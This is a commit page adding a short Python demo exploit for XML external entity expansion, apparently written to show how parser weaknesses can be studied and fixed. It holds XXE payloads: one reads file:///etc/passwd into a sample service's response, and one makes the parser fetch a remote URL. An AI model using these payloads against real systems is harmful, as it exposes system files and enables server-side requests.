Christian Heimes avatar Christian Heimes committed 82f4037

Add demo exploit for external entity expansion

Comments (0)

Files changed (1)

other/python-external.py

+#!/usr/bin/python
+"""Demo exploit for external entity expansion
+"""
+import sys
+from xml.sax import ContentHandler
+from xml.sax import parseString
+
+xml_good = """<weather>Aachen</weather>"""
+
+xml_bad_file = """<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE weather [
+<!ENTITY passwd SYSTEM "file:///etc/passwd">
+]>
+<weather>&passwd;</weather>
+"""
+
+xml_bad_url = """<?xml version="1.0" encoding="utf-8"?>
+<!DOCTYPE weather [
+<!ENTITY url SYSTEM "http://hg.python.org/cpython/raw-file/a11ddd687a0b/Lib/test/dh512.pem">
+]>
+<weather>&url;</weather>
+"""
+
+
+class WeatherHandler(ContentHandler):
+    def __init__(self):
+        ContentHandler.__init__(self)
+        self.tag = "unseen"
+        self.city = []
+
+    def startElement(self, name, attrs):
+        if name != "weather" or self.tag != "unseen":
+            raise ValueError(name)
+        self.tag = "processing"
+
+    def endElement(self, name):
+        self.tag = "seen"
+        self.city = "".join(self.city)
+
+    def characters(self, content):
+        if self.tag == "processing":
+           self.city.append(content)
+
+
+def weatherResponse(xml):
+    handler = WeatherHandler()
+    parseString(xml, handler)
+    if handler.city == "Aachen":
+        return "<weather>The weather in %s is terrible.</weather" % handler.city
+    else:
+        return "<error>Unknown city %s</error>" % handler.city[:500]
+
+for xml in (xml_good, xml_bad_file, xml_bad_url):
+    print("\nREQUEST:\n--------")
+    print(xml)
+    print("\nRESPONSE:\n---------")
+    print(weatherResponse(xml))
+    print("")
Tip: Filter by directory path e.g. /media app.js to search for public/media/app.js.
Tip: Use camelCasing e.g. ProjME to search for ProjectModifiedEvent.java.
Tip: Filter by extension type e.g. /repo .js to search for all .js files in the /repo directory.
Tip: Separate your search with spaces e.g. /ssh pom.xml to search for src/ssh/pom.xml.
Tip: Use ↑ and ↓ arrow keys to navigate and return to view the file.
Tip: You can also navigate files with Ctrl+j (next) and Ctrl+k (previous) and view the file with Ctrl+o.
Tip: You can also navigate files with Alt+j (next) and Alt+k (previous) and view the file with Alt+o.